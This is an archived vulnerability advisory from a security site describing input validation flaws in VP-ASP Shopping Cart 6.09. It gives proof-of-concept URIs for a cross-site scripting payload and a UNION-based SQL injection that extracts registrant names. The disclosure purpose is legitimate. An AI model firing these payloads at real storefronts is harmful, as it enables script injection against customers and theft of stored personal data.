exploits , vulnerabilities , articles , VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities

Title	VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
Published	2007-01-11-12:00AM
Updated	2007-01-12-05:50PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	ajann is credited with the discovery of these vulnerabilities.
Vulnerable	VPASP Shopping Cart 6.09
Not Vulnerable
Code	To exploit a cross-site scritping issue: An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI. The following proof-of-concept URI is available: http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E To exploit an SQL-injection issue: An attacker can exploit this issue via a web client. The following proof-of-concept URI is available: http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-07 FFmpeg TCP/UDP Memory Leak Denial Of ServiceVulnerability
• 2009-12-04 Achievo Document Types Section Arbitrary File Upload Vulnerability
• 2009-12-04 Achievo Scheduler Category HTML Injection Vulnerability
• 2009-12-04 Yoast Google Analytics for WordPress Plugin 404 Error Page Cross Site Scripting Vulnerability
• 2009-12-04 DevIL DICOM File Handling Remote Buffer Overflow Vulnerability
• 2009-12-04 Invision Power Board Local File Include and SQL Injection Vulnerabilities
• 2009-12-04 Mozilla Firefox Yoono Extension DOM Event Handler Cross Domain Scripting Vulnerability
• 2009-12-04 UBB.threads Multiple File Include Vulnerabilities
• 2009-12-04 Expat Unspecified XML Parsing Remote Denial of Service Vulnerability
• 2009-12-04 Apple Mac OS X Java Applet Certificate Validation Security Bypass Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Tue, 08 Dec 2009 07:40:23 +0000